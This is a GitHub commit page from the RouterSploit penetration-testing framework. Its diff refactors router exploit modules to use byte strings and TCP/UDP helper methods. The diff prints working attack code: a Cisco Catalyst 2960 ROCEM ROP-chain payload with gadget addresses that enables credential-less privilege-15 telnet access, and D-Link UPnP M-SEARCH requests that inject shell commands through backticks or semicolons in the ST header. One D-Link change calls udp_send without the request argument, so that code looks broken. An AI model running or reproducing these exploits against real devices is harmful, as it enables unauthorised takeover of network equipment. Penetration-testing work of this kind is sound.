Skip to content

Commit 0401a67

Browse files
authored
TCP & UDP based exploits (#451)
* Fixing TCP & UDP based exploits * Fixing Mikrotik API ROS
1 parent 214a544 commit 0401a67

File tree

8 files changed

+158
-179
lines changed

8 files changed

+158
-179
lines changed

routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -71,14 +71,16 @@ def target_function(self, running, creds):
7171
def check(self):
7272
tcp_client = self.tcp_connect()
7373
if tcp_client:
74+
self.tcp_close(tcp_client)
7475
return True
7576

7677
return False
7778

7879
def check_default(self):
7980
self.credentials = []
8081

81-
self.run_threads(self.target_function, self.defaults)
82+
data = LockedIterator(self.defaults)
83+
self.run_threads(self.threads, self.target_function, data)
8284

8385
if self.credentials:
8486
return self.credentials

routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py

Lines changed: 73 additions & 75 deletions
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,9 @@
1-
import socket
2-
import telnetlib
31
from routersploit.core.exploit import *
42
from routersploit.core.tcp.tcp_client import TCPClient
3+
from routersploit.core.telnet.telnet_client import TelnetClient
54

65

7-
class Exploit(TCPClient):
6+
class Exploit(TCPClient, TelnetClient):
87
__info__ = {
98
"name": "Cisco Catalyst 2960 ROCEM RCE",
109
"description": "Module exploits Cisco Catalyst 2960 ROCEM RCE vulnerability. "
@@ -37,126 +36,126 @@ def __init__(self):
3736
# Cisco Catalyst 2960 IOS 12.2(55)SE1
3837
{
3938
"template": (
40-
"\xff\xfa\x24\x00" +
41-
"\x03CISCO_KITS\x012:" +
42-
"A" * 116 +
39+
b"\xff\xfa\x24\x00" +
40+
b"\x03CISCO_KITS\x012:" +
41+
b"A" * 116 +
4342
# first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
44-
"\x00\x00\x37\xb4" +
43+
b"\x00\x00\x37\xb4" +
4544
# next bytes are shown as offsets from r1
4645
# +8 address of pointer to is_cluster_mode function - 0x34
47-
"\x02\x2c\x8b\x74" +
48-
"{FUNC_IS_CLUSTER_MODE}" +
46+
b"\x02\x2c\x8b\x74" +
47+
b"{FUNC_IS_CLUSTER_MODE}" +
4948
# +16(+0) r1 points here at second gadget
50-
"BBBB" +
49+
b"BBBB" +
5150
# +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
52-
"\x00\xdf\xfb\xe8" +
51+
b"\x00\xdf\xfb\xe8" +
5352
# +8
54-
"CCCC" +
53+
b"CCCC" +
5554
# +12
56-
"DDDD" +
55+
b"DDDD" +
5756
# +16(+0) r1 points here at third gadget
58-
"EEEE" +
57+
b"EEEE" +
5958
# +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
60-
"\x00\x06\x78\x8c" +
59+
b"\x00\x06\x78\x8c" +
6160
# +8 r1+8 = 0x022c8b60
62-
"\x02\x2c\x8b\x60" +
61+
b"\x02\x2c\x8b\x60" +
6362
# +12
64-
"FFFF" +
63+
b"FFFF" +
6564
# +16(+0) r1 points here at fourth gadget
66-
"GGGG" +
65+
b"GGGG" +
6766
# +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
68-
"\x00\x6b\xa1\x28" +
69-
"{FUNC_PRIVILEGE_LEVEL}" +
67+
b"\x00\x6b\xa1\x28" +
68+
b"{FUNC_PRIVILEGE_LEVEL}" +
7069
# +12
71-
"HHHH" +
70+
b"HHHH" +
7271
# +16(+0) r1 points here at fifth gadget
73-
"IIII" +
72+
b"IIII" +
7473
# +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
75-
"\x01\x48\xe5\x60" +
74+
b"\x01\x48\xe5\x60" +
7675
# +8 r1 points here at third gadget
77-
"JJJJ" +
76+
b"JJJJ" +
7877
# +12
79-
"KKKK" +
78+
b"KKKK" +
8079
# +16
81-
"LLLL" +
80+
b"LLLL" +
8281
# +20 original execution flow return addr
83-
"\x01\x13\x31\xa8" +
84-
":15:" + "\xff\xf0"
82+
b"\x01\x13\x31\xa8" +
83+
b":15:" + b"\xff\xf0"
8584
),
8685
"func_is_cluster_mode": {
8786
# +12 set address of func that rets 1
88-
"set": "\x00\x00\x99\x80",
87+
"set": b"\x00\x00\x99\x80",
8988
# unset
90-
"unset": "\x00\x04\xea\x58"
89+
"unset": b"\x00\x04\xea\x58"
9190
},
9291
"func_privilege_level": {
9392
# +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
94-
"set": "\x00\x12\x52\x1c",
93+
"set": b"\x00\x12\x52\x1c",
9594
# unset
96-
"unset": "\x00\x04\xe6\xf0"
95+
"unset": b"\x00\x04\xe6\xf0"
9796
}
9897
},
9998

10099
# Cisco Catalyst 2960 IOS 12.2(55)SE11
101100
{
102101
"template": (
103-
"\xff\xfa\x24\x00" +
104-
"\x03CISCO_KITS\x012:" +
105-
"A" * 116 +
102+
b"\xff\xfa\x24\x00" +
103+
b"\x03CISCO_KITS\x012:" +
104+
b"A" * 116 +
106105
# first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
107-
"\x00\x00\x37\xb4" +
106+
b"\x00\x00\x37\xb4" +
108107
# next bytes are shown as offsets from r1
109108
# +8 address of pointer to is_cluster_mode function - 0x34
110-
"\x02\x3d\x55\xdc" +
111-
"{FUNC_IS_CLUSTER_MODE}" +
109+
b"\x02\x3d\x55\xdc" +
110+
b"{FUNC_IS_CLUSTER_MODE}" +
112111
# +16(+0) r1 points here at second gadget
113-
"BBBB" +
112+
b"BBBB" +
114113
# +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
115-
"\x00\xe1\xa9\xf4" +
114+
b"\x00\xe1\xa9\xf4" +
116115
# +8
117-
"CCCC" +
116+
b"CCCC" +
118117
# +12
119-
"DDDD" +
118+
b"DDDD" +
120119
# +16(+0) r1 points here at third gadget
121-
"EEEE" +
120+
b"EEEE" +
122121
# +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
123-
"\x00\x06\x7b\x5c" +
122+
b"\x00\x06\x7b\x5c" +
124123
# +8 r1+8 = 0x23d55c8
125-
"\x02\x3d\x55\xc8" +
124+
b"\x02\x3d\x55\xc8" +
126125
# +12
127-
"FFFF" +
126+
b"FFFF" +
128127
# +16(+0) r1 points here at fourth gadget
129-
"GGGG" +
128+
b"GGGG" +
130129
# +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
131-
"\x00\x6c\xb3\xa0" +
132-
"{FUNC_PRIVILEGE_LEVEL}" +
130+
b"\x00\x6c\xb3\xa0" +
131+
b"{FUNC_PRIVILEGE_LEVEL}" +
133132
# +12
134-
"HHHH" +
133+
b"HHHH" +
135134
# +16(+0) r1 points here at fifth gadget
136-
"IIII" +
135+
b"IIII" +
137136
# +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
138-
"\x01\x4a\xcf\x98" +
137+
b"\x01\x4a\xcf\x98" +
139138
# +8 r1 points here at third gadget
140-
"JJJJ" +
139+
b"JJJJ" +
141140
# +12
142-
"KKKK" +
141+
b"KKKK" +
143142
# +16
144-
"LLLL" +
143+
b"LLLL" +
145144
# +20 original execution flow return addr
146-
"\x01\x14\xe7\xec" +
147-
":15:" + "\xff\xf0"
145+
b"\x01\x14\xe7\xec" +
146+
b":15:" + b"\xff\xf0"
148147
),
149148
"func_is_cluster_mode": {
150149
# +12 set address of func that rets 1
151-
"set": "\x00\x00\x99\x9c",
150+
"set": b"\x00\x00\x99\x9c",
152151
# unset
153-
"unset": "\x00\x04\xeA\xe0"
152+
"unset": b"\x00\x04\xeA\xe0"
154153
},
155154
"func_privilege_level": {
156155
# +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr;
157-
"set": "\x00\x27\x0b\x94",
156+
"set": b"\x00\x27\x0b\x94",
158157
# unset
159-
"unset": "\x00\x04\xe7\x78"
158+
"unset": b"\x00\x04\xe7\x78"
160159
}
161160
}
162161
]
@@ -172,13 +171,12 @@ def run(self):
172171

173172
print_status("Trying to connect to Telnet service on port {}".format(self.telnet_port))
174173

175-
try:
176-
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
177-
s.connect((self.target, int(self.telnet_port)))
178-
174+
tcp_client = self.tcp_connect()
175+
if tcp_client:
176+
response = self.tcp_recv(tcp_client, 1024)
179177
print_status("Connection OK")
180-
print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024))))
181-
except Exception:
178+
print_status("Received bytes from telnet service: {}".format(repr(response)))
179+
else:
182180
print_error("Connection failed")
183181
return
184182

@@ -191,25 +189,25 @@ def run(self):
191189
print_status("Unsetting credless privilege 15 authentication")
192190

193191
print_status("Sending cluster option")
194-
s.send(payload)
195-
s.close()
192+
self.tcp_send(tcp_client, payload)
193+
self.tcp_close(tcp_client)
196194

197195
print_status("Payload sent")
198196

199197
if self.action == 'set':
200198
print_status("Connecting to Telnet service...")
201-
try:
202-
t = telnetlib.Telnet(self.target, int(self.telnet_port))
203-
t.interact()
204-
except Exception:
199+
telnet_client = self.telnet_connect()
200+
if telnet_client:
201+
self.telnet_interactive(telnet_client)
202+
else:
205203
print_error("Exploit failed")
206204
else:
207205
print_status("Check if Telnet authentication was set back")
208206

209207
def build_payload(self):
210208
payload = self.payloads[self.device]['template']
211-
payload = payload.replace("{FUNC_IS_CLUSTER_MODE}", self.payloads[self.device]['func_is_cluster_mode'][self.action])
212-
payload = payload.replace("{FUNC_PRIVILEGE_LEVEL}", self.payloads[self.device]['func_privilege_level'][self.action])
209+
payload = payload.replace(b"{FUNC_IS_CLUSTER_MODE}", self.payloads[self.device]['func_is_cluster_mode'][self.action])
210+
payload = payload.replace(b"{FUNC_PRIVILEGE_LEVEL}", self.payloads[self.device]['func_privilege_level'][self.action])
213211

214212
return payload
215213

routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py

Lines changed: 27 additions & 29 deletions
Original file line numberDiff line numberDiff line change
@@ -35,42 +35,40 @@ def run(self):
3535
print_error("Exploit failed - target seems to be not vulnerable")
3636

3737
def execute(self, cmd):
38-
buf = ("M-SEARCH * HTTP/1.1\r\n"
39-
"Host:239.255.255.250:1900\r\n"
40-
"ST:uuid:`" + cmd + "`\r\n"
41-
"Man:\"ssdp:discover\"\r\n"
42-
"MX:2\r\n\r\n")
38+
cmd = bytes(cmd, "utf-8")
4339

44-
try:
45-
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
46-
sock.settimeout(10)
47-
sock.connect((self.target, 1900))
48-
sock.send(buf)
49-
sock.close()
50-
except socket.error:
51-
pass
40+
request = (
41+
b"M-SEARCH * HTTP/1.1\r\n" +
42+
b"Host:239.255.255.250:1900\r\n" +
43+
b"ST:uuid:`" + cmd + b"`\r\n" +
44+
b"Man:\"ssdp:discover\"\r\n" +
45+
b"MX:2\r\n\r\n"
46+
)
47+
48+
udp_client = self.udp_create()
49+
self.udp_send(udp_client, request)
50+
self.udp_close(udp_client)
5251

5352
return ""
5453

5554
@mute
5655
def check(self):
57-
buf = ("M-SEARCH * HTTP/1.1\r\n"
58-
"Host:239.255.255.250:1900\r\n"
59-
"ST:upnp:rootdevice\r\n"
60-
"Man:\"ssdp:discover\"\r\n"
61-
"MX:2\r\n\r\n")
56+
request = (
57+
b"M-SEARCH * HTTP/1.1\r\n"
58+
b"Host:239.255.255.250:1900\r\n"
59+
b"ST:upnp:rootdevice\r\n"
60+
b"Man:\"ssdp:discover\"\r\n"
61+
b"MX:2\r\n\r\n"
62+
)
63+
64+
udp_client = self.udp_create()
6265

63-
try:
64-
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
65-
sock.settimeout(10)
66-
sock.connect((self.target, 1900))
67-
sock.send(buf)
68-
response = sock.recv(65535)
69-
sock.close()
70-
except Exception:
71-
return False # target is not vulnerable
66+
if udp_client:
67+
self.udp_send(udp_client, request)
68+
response = self.udp_recv(udp_client, 65535)
69+
self.udp_close(udp_client)
7270

73-
if "Linux, UPnP/1.0, DIR-" in response:
74-
return True # target is vulnerable
71+
if response and "Linux, UPnP/1.0, DIR-" in response:
72+
return True # target is vulnerable
7573

7674
return False # target is not vulnerable

routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py

Lines changed: 13 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -30,16 +30,19 @@ def run(self):
3030
shell(self, architecture="mipsle")
3131

3232
def execute(self, cmd):
33-
buf = ('M-SEARCH * HTTP/1.1\r\n'
34-
'HOST:' + self.target + ':1900\r\n'
35-
'ST:urn:schemas-upnp-org:service:WANIPConnection:1;' + cmd + ';ls\r\n'
36-
'MX:2\r\n'
37-
'MAN:"ssdp:discover"\r\n\r\n')
38-
39-
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
40-
s.connect((self.target, 1900))
41-
s.send(buf)
42-
s.close()
33+
request = (
34+
"M-SEARCH * HTTP/1.1\r\n" +
35+
"HOST:{}:{}\r\n".format(self.target, self.port) +
36+
"ST:urn:schemas-upnp-org:service:WANIPConnection:1;{};ls\r\n".format(cmd) +
37+
"MX:2\r\n" +
38+
"MAN:\"ssdp:discover\"\r\n\r\n"
39+
)
40+
41+
request = bytes(request, "utf-8")
42+
43+
udp_client = self.udp_create()
44+
self.udp_send(udp_client)
45+
self.udp_close(udp_client)
4346

4447
return ""
4548

0 commit comments

Comments
 (0)